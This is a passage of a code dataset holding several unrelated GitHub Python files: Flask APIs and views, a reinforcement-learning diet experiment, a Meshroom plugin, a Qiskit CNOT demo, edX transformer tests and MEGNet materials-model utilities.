tags:\n - Agents\n parameters:\n - name: name\n in: query \n type: string\n required: true\n - name: body\n in: body\n required: true\n schema:\n id: agent\n required:\n - url\n - token\n - type\n properties:\n url:\n type: string\n description: Agents url.\n default: localhost:123\n token:\n type: string\n description: Agents api token.\n default: SecretToken\n type:\n type: string\n description: Agents vc type.\n default: VC 2.0\n security:\n - APIKeyHeader: ['x-auth-token']\n responses:\n 200:\n description: The id of the new agent.\n schema:\n ID: \n type: integer\n \"\"\"\n name = request.args[\"name\"]\n data = request.json\n\n agent = Agent()\n agent.name = name\n agent.url = data[\"url\"]\n agent.api_token = data[\"token\"]\n agent.vc_type = data[\"type\"]\n\n id = AgentHandler.add(agent)\n\n return str(id)","repo_name":"IDunion/ssimoodle","sub_path":"VC_API/src/server/controller/agent_controller.py","file_name":"agent_controller.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"3856511002","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Sema\n\"\"\"\nimport datetime\ndate = datetime.datetime.now().strftime('%y_%m_%d_%H_%M')\nimport logging\nimport pickle\nimport random\nimport numpy as np\nimport pandas as pd\nfrom itertools import permutations\nfrom userModel import User, Food, Meal, UserDiet, Substitution\nfrom policies import System\n\n\ndef xp(A0, actions, epsilon, alpha, gamma, subScores,\n nomen, user, diet, nbItem, A, meanQuantities, itemsDict, \n portions, composition, socio, adequacyRef, moderationRef, \n nLastDays, T, filename):\n \n #User initialization \n logging.info('-------------------------------------------------------')\n logging.info('Initialization of user...')\n userDiet = UserDiet(nomen, user, diet, nbItem, A, meanQuantities, itemsDict, \n portions, composition, socio, adequacyRef, moderationRef, \n nLastDays)\n logging.debug('Setting the initial PandietScore...')\n p = userDiet.computePandietScore()\n userDiet.updatePandiet(p)\n \n #Expert initialization\n logging.info('-------------------------------------------------------')\n\n logging.info('Initialization of expert...')\n meals = [x.nameTuple for x in diet if x.nameTuple]\n ms = list(set(meals))\n expert = System(A0, actions, epsilon, alpha, gamma, ms, subScores)\n \n \n # Learning phase\n logging.info('-------------------------------------------------------')\n logging.info('Learning phase...')\n userDiet, expert, pandietRewards = learningPhase(userDiet, expert, T, utility='mixed')\n with open('res2.p', 'wb') as handle:\n pickle.dump({'user':userDiet, 'expert':expert, \n 'pandietRewards':pandietRewards}, handle)\n return userDiet, expert, pandietRewards\n\n\ndef learningPhase(userDiet, expert, T, saveFileName, utility='mixed'):\n \n pandietRewards = {}\n \n lastMeal = userDiet.getLastMeal()\n jour = lastMeal.jour\n tyrep = lastMeal.tyrep\n state = userDiet.generateNextMeal(jour=jour, tyrep=tyrep)\n print('The first state is {}'.format(state.nameTuple))\n userDiet.addMeal(state)\n# p1 = userDiet.computePandietScore()\n# userDiet.updatePandiet(p1)\n\n for timestep in range(1,T):\n userDiet.timestep = timestep\n \n logging.info('LEARNING TIMESTEP {}'.format(timestep))\n logging.info('State : '.format(state))\n distributionDict = expert.provideSubstitutions(state, userDiet, \n function=utility)\n utilityDistribution = distributionDict[utility]\n baselineDistribution = distributionDict['baseline']\n chosenAction = expert.selectAction(state, 'epsilonGreedy', \n utilityDistribution)\n baselineAction = expert.selectAction(state, 'greedy', baselineDistribution)\n \n logging.info('Current state: {}, chosen action: {}'.format(state.nameTuple, chosenAction))\n acceptanceProb = userDiet.computeAcceptabilityProb(state, chosenAction)\n baselineAcceptance = userDiet.computeAcceptabilityProb(state, baselineAction)\n logging.info('Action {}, probability of acceptance: {}'.format(chosenAction, acceptanceProb))\n logging.info('Baseline action {}, probability of acceptance: {}'.format(baselineAction, \n baselineAcceptance))\n \n # Track \n expert.trackGreedyBaselineResults(timestep, baselineDistribution, \n baselineAction, baselineAcceptance)\n\n # Generating the next meal\n prevMeal = userDiet.getLastMeal()\n jour = prevMeal.jour\n tyrep = prevMeal.tyrep \n \n newTyrep = 1 + tyrep%3\n if newTyrep == 1:\n newJour = jour + 1\n else:\n newJour = jour\n nextS = userDiet.generateNextMeal(jour=newJour, tyrep=newTyrep)\n logging.info('The next state is: {}'.format(nextS.nameTuple))\n \n # Create the substitution object\n # \n # s = Substitution(x, y, subScore, p.pandiet, deltaPandiet, timestep)\n \n prevPandiet = userDiet.computePandietScore()\n\n if acceptanceProb == 1:\n stateName = state.nameTuple\n x, y, newMeal = userDiet.substituteItemInDiet(state, chosenAction)\n userDiet.replaceLastMeal(newMeal, verbose=1)\n nextPandiet = userDiet.computePandietScore()\n deltaPandiet = prevPandiet.pandiet - nextPandiet.pandiet\n \n subScore = expert.Q[chosenAction].loc[[stateName]].values[0]\n \n s = Substitution(x, y, subScore, nextPandiet.pandiet, deltaPandiet, timestep)\n userDiet.addToSubstitutionTrack(s)\n \n rewardUser = deltaPandiet\n rewardExpert = 1 \n \n pandietRewards[timestep] = deltaPandiet\n\n # Updates user and coach models\n nextSname = nextS.nameTuple\n \n nextDistributionDict = expert.provideSubstitutions(nextS, \n userDiet, \n function=utility)\n nextUtilityDistribution = nextDistributionDict[utility]\n nextChosenAction = expert.selectAction(state, \n 'greedy', \n nextUtilityDistribution)\n \n maxNextValue = expert.Q[nextChosenAction].loc[[nextSname]].values[0]\n expert.qlearningUpdate(state, chosenAction, rewardExpert, maxNextValue)\n userDiet.updateMealDistribution(stateName, newMeal.nameTuple, rewardUser)\n logging.info('Timestep {0}, accepted action {1} with PandietGain {2:.4f} '.format(timestep, \n chosenAction, deltaPandiet))\n else:\n logging.info('Timestep {0}, refused action {1} '.format(timestep, chosenAction))\n nextPandiet = prevPandiet\n state = nextS\n userDiet.updatePandiet(timestep, nextPandiet)\n\n\n logging.info('-------------------------------------------------------')\n with open(saveFileName, 'wb') as handle:\n res = {'userDiet':userDiet, 'expert':expert, 'rewards':pandietRewards}\n pickle.dump(res, handle)\n return userDiet, expert, pandietRewards","repo_name":"SemaA/RLNutrition","sub_path":"XP_rl.py","file_name":"XP_rl.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37867784244","text":"# Generic options:\n# -h [ --help ] produce this help message\n# -w [ --working-folder ] arg working directory (default current directory)\n# -c [ --config-file ] arg (=TextureMesh.cfg)\n# file name containing program options\n# --export-type arg (=ply) file type used to export the 3D scene (ply or obj)\n# --archive-type arg (=2) project archive type: 0-text, 1-binary, 2-compressed binary\n# --process-priority arg (=-1) process priority (below normal by \n# default)\n# --max-threads arg (=0) maximum number of threads (0 for using \n# all available cores)\n# -v [ --verbosity ] arg (=2) verbosity level\n# \n# Texture options:\n# -i [ --input-file ] arg input filename containing camera poses and image list\n# -o [ --output-file ] arg output filename for storing the mesh\n# --decimate arg (=1) decimation factor in range [0..1] to be applied to the input surface before refinement (0 - auto, 1 - disabled)\n# --close-holes arg (=30) try to close small holes in the input surface (0 - disabled)\n# --resolution-level arg (=0) how many times to scale down the images before mesh refinement\n# --min-resolution arg (=640) do not scale images lower than this resolution\n# --outlier-threshold arg (=0.0599999987)\n# threshold used to find and remove outlier face textures (0 - disabled)\n# --cost-smoothness-ratio arg (=0.100000001)\n# ratio used to adjust the preference for more compact patches (1 - best \n# quality/worst compactness, ~0 - worst quality/best compactness)\n# --global-seam-leveling arg (=1) generate uniform texture patches using \n# global seam leveling\n# --local-seam-leveling arg (=1) generate uniform texture patch borders \n# using local seam leveling\n# --texture-size-multiple arg (=0) texture size should be a multiple of \n# this value (0 - power of two)\n# --patch-packing-heuristic arg (=3) specify the heuristic used when \n# deciding where to place a new patch (0 \n# - best fit, 3 - good speed, 100 - best \n# speed)\n# --empty-color arg (=16744231) color used for faces not covered by any\n# image\n# --orthographic-image-resolution arg (=0)\n# orthographic image resolution to be generated from the textured mesh - the \n# mesh is expected to be already geo-referenced or at least properly oriented (0 - disabled)\r\n\r\n__version__ = \"1.0\"\r\n\r\nfrom meshroom.core import desc\r\n\r\nclass TextureMesh(desc.CommandLineNode):\r\n commandLine = '\"./OpenMVS/TextureMesh\" {scenedirValue}'\r\n\t\r\n# category = 'MVS'\r\n documentation = '''\r\nIn the case of having a perfect mesh reconstruction and ground-truth camera poses, obtaining the texture is relatively a strait-forward step. In reality however both the mesh and the camera poses contain slight variations/errors at best, and hence the mesh texturing module should be able to cope with them. A very good paper describing such an algorithm, implemented in OpenMVS, is: Let There Be Color! - Large-Scale Texturing of 3D Reconstructions M. Waechter et al. 2014.\r\n## Online\r\n[https://github.com/cdcseacave/openMVS](https://github.com/cdcseacave/openMVS)\r\n'''\r\n\r\n inputs = [\r\n desc.File(\r\n name=\"scenedir\",\r\n label=\"Scene directory\",\r\n description=\"Scene directory\",\r\n value=\"\",\r\n uid=[0],\r\n\t\t)\r\n ]\r\n\r\n outputs = [\r\n desc.File(\r\n name=\"output\",\r\n label=\"Output Folder\",\r\n description=\"Output PLY\",\r\n value=\"\",\r\n uid=[0],\r\n )\r\n ]","repo_name":"natowi/meshroom_external_plugins","sub_path":"draft/OpenMVS/TextureMesh.py","file_name":"TextureMesh.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"3"} +{"seq_id":"2126593524","text":"'''\nSocialytics needs a new tool that allows big brands to see how many of an influencer's followers are loyal to their brand. Complete the get_avg_brand_followers function. It takes two inputs:\n\nall_handles: a 2-dimensional list, or \"list of lists\" of strings representing instagram user handles on a per-influencer basis.\nbrand_name: a string.\nget_avg_brand_followers returns the average number of handles that contain the brand_name across all the lists. Each list represents the audience of a single influencer.\n'''\n\ndef get_avg_brand_followers(all_handles, brand_name):\n count = 0\n for handle in all_handles:\n for string in handle:\n if brand_name in string:\n count += 1\n return count / len(all_handles)","repo_name":"dtm589/testing","sub_path":"brandName.py","file_name":"brandName.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4949912610","text":"#!/usr/bin/python3\n\nfrom argparse import ArgumentParser\nimport requests\nimport time\nimport random\nimport sys\n\nplayer_dist = {\n 10243: {\"chance\": 4, \"count\": 0}, # Thomas Mueller\n 6556: {\"chance\": 3, \"count\": 0}, # Manuel Neuer\n 9039: {\"chance\": 2, \"count\": 0}, # Robert Lewandowski\n 5145: {\"chance\": 1, \"count\": 0} #Jonas Hector\n}\nchances_list = []\nfor p in player_dist.keys():\n chances_list.extend([p] * player_dist[p][\"chance\"])\n\n\ndef rand_playerid():\n '''Get a random playerid according to the chances from player_dist'''\n return random.choice(chances_list)\n \n\nif __name__ == \"__main__\":\n '''Sends multiple requests to the minikube public ip. If not specified as cmd-arg, the default amount is 40.\n The requested playerid is randomized chosen based on chance for each player.'''\n\n parser = ArgumentParser()\n parser.add_argument(\"amount\", nargs=\"?\", default=40)\n n = int(parser.parse_args().amount)\n\n start = time.time()\n print(\"Sending requests..\")\n for i in range(1, n):\n time.sleep(0.05)\n playerid = rand_playerid()\n url = 'http://10.0.2.15/person/{0}'.format(playerid)\n response = requests.get(url)\n if response.status_code == 200:\n player_dist[playerid][\"count\"] = player_dist[playerid][\"count\"] + 1\n else:\n print(\"Request for {0} failed with status code {1}.\\nAborting\".format(url, response.status_code))\n sys.exit(-1)\n end = time.time()\n print(\"Performed {0} requests in {1:.2f} seconds. Statistics are:\".format(n, (end - start)))\n print(player_dist)\n","repo_name":"Lyceoth/DataEngineeringProject","sub_path":"autorequester.py","file_name":"autorequester.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"558492989","text":"import sys, statistics\r\nimport numpy as np\r\nFILE_DIR = \"single_image_bbox/\"\r\nif len(sys.argv) is not 4:\r\n\tprint(\"Usage: program unbuntu_result_file phone_result_file frequency\")\r\nelse:\r\n infile1 = sys.argv[1]\r\n infile2 = sys.argv[2]\r\n freq = sys.argv[3]\r\n\r\ngt = []\r\nbbox = []\r\ncount_1, count_2 = 0, 0\r\nwith open(infile1, \"r\") as f:\r\n\tfor line in f:\r\n\t\tline = line.split()\r\n\t\t# print(line)\r\n\t\ttry:\r\n\t\t\ttop = eval(line[0])\r\n\t\t\tleft = eval(line[1])\r\n\t\t\tbottom = eval(line[2])\r\n\t\t\tright = eval(line[3])\r\n\t\t\tgt.append((top, left, bottom, right))\r\n\t\texcept:\r\n\t\t\tgt.append(())\r\n\r\npre = []\r\nwith open(infile2, \"r\") as f:\r\n\tfor line in f:\r\n\t\tline = line.split()\r\n\t\ttop = eval(line[0])\r\n\t\tleft = eval(line[1])\r\n\t\tbottom = eval(line[2])\r\n\t\tright = eval(line[3])\r\n\t\tpre.append((top, left, bottom, right))\r\n\r\n# print(gt)\r\nfor i, g in enumerate(gt):\r\n if not g:\r\n continue\r\n #trying to opportunistically change the frequency depending on previous IOU value\r\n #\"\"\"\r\n if(freq ==1): \r\n count_1+=1\r\n else:\r\n count_2+=1\r\n #\"\"\"\r\n if(i%int(freq)==0):\r\n p = pre[i]\r\n #randomly trying to have switch between 1 & 2\r\n #freq = np.random.choice([1,2], p=[0.3, 0.7])\r\n if(True):\r\n top = max(g[0], p[0])\r\n left = max(g[1], p[1])\r\n bottom = min(g[2], p[2])\r\n right = min(g[3], p[3])\r\n interarea = max(0, bottom - top + 1) * max(0, right - left + 1)\r\n #Union Area\r\n b1_area = (g[2] - g[0] +1)*(g[3] - g[1] +1)\r\n b2_area = (p[2] - p[0] +1)*(p[3] - p[1] +1)\r\n # print(interarea)\r\n iou = interarea / (b1_area + b2_area - interarea)\r\n print(iou)\r\n bbox.append(iou)\r\n #trying to opportunistically change the frequency depending on previous IOU value\r\n \"\"\"\r\n if(iou<0.8):\r\n freq = 1\r\n else:\r\n freq = 2\r\n \"\"\"\r\n \r\n\r\nprint(bbox)\r\nprint(sum(bbox)/len(bbox))\r\nprint(statistics.stdev(bbox))\r\n#removing noise\r\nbbox_1 = [i for i in bbox if i > 0.8]\r\nprint(statistics.mean(bbox_1))\r\nprint(statistics.stdev(bbox_1))\r\n\r\nprint(str(count_1) + \",\" + str(count_2))\r\n \r\n \r\n\t","repo_name":"spaul13/Obj_detection_Algorithm_Tuning","sub_path":"calculate_iou_freq.py","file_name":"calculate_iou_freq.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72749000402","text":"import sys\nimport codecs\nfrom html.parser import HTMLParser\n\nclass Parser(HTMLParser):\n\n def __init__(self):\n super().__init__()\n self.recording = False\n\n def handle_starttag(self, tag, attrs):\n if tag == \"ul\":\n self.recording = True\n for attr in attrs:\n print(\" attr:\", attr)\n else:\n self.recording = False\n \n def handle_data(self, data):\n if self.recording:\n print(f\"Found data for tag: {repr(data)}\")\n self.recording = False\n\n\ndef main(argv):\n #print(argv)\n f = codecs.open(argv, 'r')\n doc = f.read()\n #print(doc)\n\n p = Parser()\n p.feed(doc)\n \n\nif __name__=='__main__':\n try:\n main(sys.argv[1])\n except IndexError: print('\\nMissing HTML to parse\\n')","repo_name":"enriquemondragon/WebScrapDB","sub_path":"parser_web.py","file_name":"parser_web.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16233583058","text":"from flask import render_template, redirect, request, flash, url_for, jsonify\nfrom flask_login import current_user\nfrom . import behoerde\nfrom app.common.models import Nachricht\nimport os\nfrom shutil import rmtree\n\nfrom app import db\nfrom zipfile import ZipFile\nfrom flask_login import login_required\nfrom flask import current_app as app\n\nfrom app.rest import postJsonJson, getIdJson, \\\n bauantrag_load, \\\n bauantrag_info, \\\n bauantrag_data, \\\n formellePruefung_update, \\\n formellePruefung_data\n\n\n@behoerde.route('/', methods=['GET'])\ndef index():\n bauantraege = Nachricht.query.filter_by(status=\"eingereicht\")\n return render_template(\"app/behoerde/start.html\", bauantraege=bauantraege)\n\n\n@behoerde.route('open/<id>', methods=[\"GET\"])\ndef open(id):\n bauantrag = Nachricht.query.filter_by(id=id).first()\n\n print(bauantrag.ifcloadId)\n\n data = {\"path\": os.path.join(bauantrag.path, \"content\"), \"loadedId\": bauantrag.ifcloadId}\n print(data)\n r = postJsonJson(bauantrag_load, data)\n answer = r.json()\n\n bauantrag.ifcloadId = answer[\"id\"]\n\n if r.status_code is 201:\n r = getIdJson(bauantrag_data, answer[\"id\"])\n answer = r.json()\n content = answer\n\n formellePruefung = {}\n\n if len(bauantrag.nachfolger) > 0:\n\n nachricht = bauantrag.nachfolger[0]\n\n data = {\"path\": os.path.join(nachricht.path, \"content\"), \"loadedId\": nachricht.ifcloadId}\n print(data)\n r = postJsonJson(formellePruefung_data, data)\n answer = r.json()\n\n print(answer)\n\n formellePruefung = {}\n\n if answer[\"befundBeteiligte\"]:\n formellePruefung[\"befundBeteiligte\"] = answer[\"befundBeteiligte\"]\n if answer[\"befundBauvorhaben\"]:\n formellePruefung[\"befundBauvorhaben\"] = answer[\"befundBauvorhaben\"]\n if answer[\"befundLokalisierung\"]:\n formellePruefung[\"befundLokalisierung\"] = answer[\"befundLokalisierung\"]\n if answer[\"befundAnlageMangel\"]:\n formellePruefung[\"befundAnlageMangel\"] = answer[\"befundAnlageMangel\"]\n if answer[\"befundAnlageFehlt\"]:\n formellePruefung[\"befundAnlageFehlt\"] = answer[\"befundAnlageFehlt\"]\n if answer[\"befundAbweichung\"]:\n formellePruefung[\"befundAbweichung\"] = answer[\"befundAbweichung\"]\n if answer[\"frist\"]:\n formellePruefung[\"frist\"] = answer[\"frist\"]\n\n\n return render_template(\"app/behoerde/open.html\", bauantrag=bauantrag, ba_details=content, formellePruefung=formellePruefung)\n\n\n@behoerde.route('/formellePruefung/speichern', methods=['POST'])\ndef formellePruefungAbschicken():\n\n if not current_user.activeRole == \"Behörde\":\n return \"Keine Berechtigung zur Ausführung dieser Operation\", 404\n\n vorgaenger = Nachricht.query.filter_by(id=request.form.get('vorgaengerNachrichtId')).first()\n\n data = {}\n nachricht = None\n\n print(vorgaenger.nachfolger)\n\n if len(vorgaenger.nachfolger) > 0:\n nachricht = vorgaenger.nachfolger[0]\n else:\n nachricht = Nachricht()\n nachricht.vorgaenger = vorgaenger\n db.session.add(nachricht)\n db.session.flush()\n\n repo_path = os.path.abspath(app.root_path + \"/../bauantraege/\")\n nachricht.path = os.path.join(repo_path, str(nachricht.id))\n store_path = os.path.join(nachricht.path, 'content')+\"/\"\n if not os.path.exists(os.path.dirname(store_path)):\n oldmask = os.umask(000)\n os.makedirs(os.path.dirname(store_path), 0o775)\n os.umask(oldmask)\n\n nachricht.nachrichtentyp = \"0201\"\n nachricht.status = \"erstellt\"\n nachricht.filename = \"\"\n\n\n\n\n if request.form.get('toggleBeteiligte'):\n data[\"befundBeteiligte\"] = request.form[\"textareaBeteiligte\"]\n\n if request.form.get('toggleBauvorhaben'):\n data[\"befundBauvorhaben\"] = request.form[\"textareaBauvorhaben\"]\n\n if request.form.get('toggleLokalisierung'):\n data[\"befundLokalisierung\"] = request.form[\"textareaLokalisierung\"]\n\n if request.form.get('toggleAnlageMangel'):\n data[\"befundAnlageMangel\"] = request.form[\"textareaAnlageMangel\"]\n\n if request.form.get('toggleAnlageFehlt'):\n data[\"befundAnlageFehlt\"] = request.form[\"textareaAnlageFehlt\"]\n\n if request.form.get('toggleAbweichung'):\n data[\"befundAbweichung\"] = request.form[\"textareaAbweichung\"]\n\n #print (data)\n\n if request.form.get('frist'):\n data[\"frist\"] = request.form[\"frist\"]\n\n data['path'] = nachricht.path\n data['vorgaengerPath'] = vorgaenger.path\n\n\n postJsonJson(formellePruefung_update, data)\n\n db.session.commit()\n\n\n return redirect(url_for('bauantrag.open', id=vorgaenger.id))\n\n","repo_name":"RUB-Informatik-im-Bauwesen/BIM-Bauantrag-Webportal","sub_path":"app/behoerde/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12604993563","text":"\"\"\"\nTests for StudentViewTransformer.\n\"\"\"\n\n\nimport ddt\n\n# pylint: disable=protected-access\nfrom openedx.core.djangoapps.content.block_structure.factory import BlockStructureFactory\nfrom xmodule.modulestore.tests.django_utils import ModuleStoreTestCase # lint-amnesty, pylint: disable=wrong-import-order\nfrom xmodule.modulestore.tests.factories import ToyCourseFactory # lint-amnesty, pylint: disable=wrong-import-order\n\nfrom ..student_view import StudentViewTransformer\n\n\n@ddt.ddt\nclass TestStudentViewTransformer(ModuleStoreTestCase):\n \"\"\"\n Test proper behavior for StudentViewTransformer\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.course_key = ToyCourseFactory.create().id\n self.course_usage_key = self.store.make_course_usage_key(self.course_key)\n self.block_structure = BlockStructureFactory.create_from_modulestore(self.course_usage_key, self.store)\n\n @ddt.data(\n 'video', 'html', ['video', 'html'], [],\n )\n def test_transform(self, requested_student_view_data):\n # collect phase\n StudentViewTransformer.collect(self.block_structure)\n self.block_structure._collect_requested_xblock_fields()\n\n # transform phase\n StudentViewTransformer(requested_student_view_data).transform(\n usage_info=None,\n block_structure=self.block_structure,\n )\n\n # verify video data returned iff requested\n video_block_key = self.course_key.make_usage_key('video', 'sample_video')\n assert (self.block_structure\n .get_transformer_block_field(video_block_key,\n StudentViewTransformer,\n StudentViewTransformer.STUDENT_VIEW_DATA) is not None) == \\\n ('video' in requested_student_view_data)\n\n assert not self.block_structure\\\n .get_transformer_block_field(video_block_key, StudentViewTransformer,\n StudentViewTransformer.STUDENT_VIEW_MULTI_DEVICE)\n\n # verify html data returned iff requested\n html_block_key = self.course_key.make_usage_key('html', 'toyhtml')\n assert (self.block_structure\n .get_transformer_block_field(html_block_key, StudentViewTransformer,\n StudentViewTransformer.STUDENT_VIEW_DATA) is not None) ==\\\n ('html' in requested_student_view_data)\n\n assert self.block_structure\\\n .get_transformer_block_field(html_block_key, StudentViewTransformer,\n StudentViewTransformer.STUDENT_VIEW_MULTI_DEVICE)\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/course_api/blocks/transformers/tests/test_student_view.py","file_name":"test_student_view.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"19248005047","text":"\"\"\"Django Evolution version and package information.\n\nThese variables and functions can be used to identify the version of\nReview Board. They're largely used for packaging purposes.\n\"\"\"\n\nfrom __future__ import unicode_literals\n\n\n# The version of Django Evolution\n#\n# This is in the format of:\n#\n# (Major, Minor, Micro, alpha/beta/rc/final, Release Number, Released)\n#\nVERSION = (2, 3, 1, 'alpha', 0, False)\n\n\ndef get_version_string():\n version = '%s.%s' % (VERSION[0], VERSION[1])\n\n if VERSION[2]:\n version += \".%s\" % VERSION[2]\n\n if VERSION[3] != 'final':\n if VERSION[3] == 'rc':\n version += ' RC%s' % VERSION[4]\n else:\n version += ' %s %s' % (VERSION[3], VERSION[4])\n\n if not is_release():\n version += \" (dev)\"\n\n return version\n\n\ndef get_package_version():\n version = '%s.%s' % (VERSION[0], VERSION[1])\n\n if VERSION[2]:\n version += \".%s\" % VERSION[2]\n\n tag = VERSION[3]\n\n if tag != 'final':\n if tag == 'alpha':\n tag = 'a'\n elif tag == 'beta':\n tag = 'b'\n\n version += '%s%s' % (tag, VERSION[4])\n\n return version\n\n\ndef is_release():\n return VERSION[5]\n\n\n__version_info__ = VERSION[:-1]\n__version__ = get_package_version()\n","repo_name":"beanbaginc/django-evolution","sub_path":"django_evolution/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"3"} +{"seq_id":"36889929056","text":"from qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit, execute,IBMQ\n\nIBMQ.enable_account('Enter API token here')\nprovider = IBMQ.get_provider(hub='ibm-q')\n\nq = QuantumRegister(2,'q')\nc = ClassicalRegister(2,'c')\n\ncircuit = QuantumCircuit(q,c)\ncircuit.x(q[0]) # Pauli x gate applied to first qubit \ncircuit.cx(q[0],q[1]) # CNOT applied to both qubits \ncircuit.measure(q,c) # Qubits states are measured \n\nbackend = provider.get_backend('ibmq_qasm_simulator') # Specifying qasm simulator as the target device \n\nprint('Provider: ',backend)\nprint('')\n\njob = execute(circuit, backend, shots=1)\n \nprint('Executing Job...')\nprint('') \nresult = job.result()\ncounts = result.get_counts(circuit)\n\nprint('RESULT: ',counts)\nprint('')\nprint('Press any key to close')\ninput()","repo_name":"mcoggins96/Quantum-Computing-UK-Repository","sub_path":"Basic/CNOT.py","file_name":"CNOT.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"3"} +{"seq_id":"7374996107","text":"import numpy as np\nfrom typing import List\nfrom megnet.models import MEGNetModel\nfrom megnet.data.crystal import CrystalGraph\nfrom pickle import dump, load\nfrom sklearn.preprocessing import MinMaxScaler\nimport pandas as pd\nimport os\nfrom figrecipes import PlotlyFig\nfrom typing import Tuple, Any\nfrom scipy.spatial.distance import correlation, cosine\nfrom sklearn.metrics import mean_absolute_error, r2_score, mean_squared_error\n\ndef model_setup(ntarget: int = None,\n **kwargs) -> Any:\n \"\"\"\n This function takes in a number of optional parameters for creating a MEGNet model, such as number of neurons \n in different layers, and the number of features for bonds.\n It returns an instance of a MEGNet model which is set up with the given parameters.\n \"\"\"\n ## default architecture:\n n1=kwargs.get('n1', 64) \n n2=kwargs.get('n2', 32) \n n3=kwargs.get('n3', 16)\n nfeat_bond = kwargs.get('nfeat_bond', 100)\n r_cutoff = kwargs.get('r_cutoff', 5)\n gaussian_centers = np.linspace(0, r_cutoff + 1, nfeat_bond)\n gaussian_width = kwargs.get('gaussian_width', 0.5)\n graph_converter = CrystalGraph(cutoff=r_cutoff)\n\n model = MEGNetModel(graph_converter=graph_converter, centers=gaussian_centers, width=gaussian_width,\n ntarget=ntarget, **kwargs)\n stringlist = []\n model.summary(print_fn=lambda x: stringlist.append(x))\n short_model_summary = \"\\n\".join(stringlist)\n print(short_model_summary.splitlines()[-4])\n return model\n\ndef megnet_evaluate_structures(model, structures,\n targets=None,\n scaler=None, **kwargs):\n\n labels = kwargs.get('labels', ['']*len(structures))\n\n noTargets=False\n if targets is None:\n target_values = np.array([1]*len(structures))\n noTargets=True\n else:\n if isinstance(targets, pd.DataFrame):\n target_values=targets.values\n else:\n target_values=targets\n # have to exclude structures that dont form compatible graphs and their corresponding targets.\n structures_valid = []\n targets_valid = []\n labels_valid = []\n structures_invalid = []\n for s, p, l in zip(structures, target_values, labels):\n try:\n graph = model.graph_converter.convert(s)\n structures_valid.append(s)\n if scaler is not None:\n targets_valid.append(np.nan_to_num(\n scaler.transform(p.reshape(1, -1))))\n else:\n targets_valid.append(p)\n labels_valid.append(l)\n except:\n structures_invalid.append(s)\n # structures_valid = np.array(structures_valid)\n\n y = np.array(targets_valid)\n y = y.squeeze()\n labels = np.array(labels_valid)\n print(f\"Following invalid structures: {structures_invalid}.\")\n print(type(structures_valid),structures_valid)\n ypred = model.predict_structures(list(structures_valid))\n if noTargets:\n return (structures_valid,ypred)\n if not noTargets:\n return (structures_valid,ypred, y, labels)\n # y_pred=y_pred.flatten()\n \n\ndef megnet_regression_model(model: object, scaler: object,\n structures: List[str], targets: pd.DataFrame,\n detailed_output: bool = False,\n **kwargs) -> None:\n ''' This function takes in the following required arguments:\n\n model : the model that is used to predict the structures\n structures : the list of structures to predict\n targets : the list of actual values to compare the predictions to\n scaler : the scaler used to scale the targets\n\n It also takes in an optional argument:\n detailed_output : a boolean that controls whether or not to output detailed plots (default is False)\n\n It also takes additional keyword arguments (**kwargs) for example:\n id : a string that represents the id of the model\n labels : a list of labels for the structures\n savedir : the directory to save the output files\n It uses the kwargs.get() method to get the value of the 'id' and 'labels' keys, if they don't exist, it assigns them empty string and empty list respectively.\n\n The function then separates the valid and invalid structures according to MEGNet model and calculate the mean absolute error (MAE) between \n the predictions and the actual values. It then saves the MAE values to a text file and if detailed_output is true it will create some \n plots using the library figrecipes and save the plots in a directory 'figs'\n\n The function returns None, it only prints the MAE values on the screen and saves the results in a file.\n Predicts using the model and then compares to actual values in plotly figure\n '''\n id = kwargs.get('id', '')\n\n structures_valid, ypred, y, labels = megnet_evaluate_structures(model, \n structures, \n targets=targets, \n scaler=scaler)\n # labels = kwargs.get('labels', ['']*len(structures))\n # labels = np.array(labels)\n\n # # have to exclude structures that dont form compatible graphs and their corresponding targets.\n # structures_valid = []\n # targets_valid = []\n # labels_valid = []\n # structures_invalid = []\n # for s, p, l in zip(structures, targets.values, labels):\n # try:\n # graph = model.graph_converter.convert(s)\n # structures_valid.append(s)\n # targets_valid.append(np.nan_to_num(\n # scaler.transform(p.reshape(1, -1))))\n # labels_valid.append(l)\n # except:\n # structures_invalid.append(s)\n # structures_valid = np.array(structures_valid)\n\n # y = np.array(targets_valid)\n # labels = np.array(labels_valid)\n # print(f\"Following invalid structures: {structures_invalid}.\")\n # ypred = model.predict_structures(structures_valid)\n # print(ypred)\n # # y_pred=y_pred.flatten()\n # y = y.squeeze()\n MAEs = mean_absolute_error(y, ypred, multioutput='raw_values')\n\n maes_text = f'MAEs mean: {MAEs.mean()}'\n savedir = kwargs.get('savedir', './')\n if not os.path.exists(savedir):\n os.mkdir(savedir)\n\n with open(savedir+'MAE_'+id+'.txt', 'w') as f:\n f.write(maes_text)\n print(maes_text)\n\n # MAEs=pd.DataFrame(MAEs.reshape(1,-1),columns=targets.columns)\n MAEs = pd.DataFrame(MAEs, 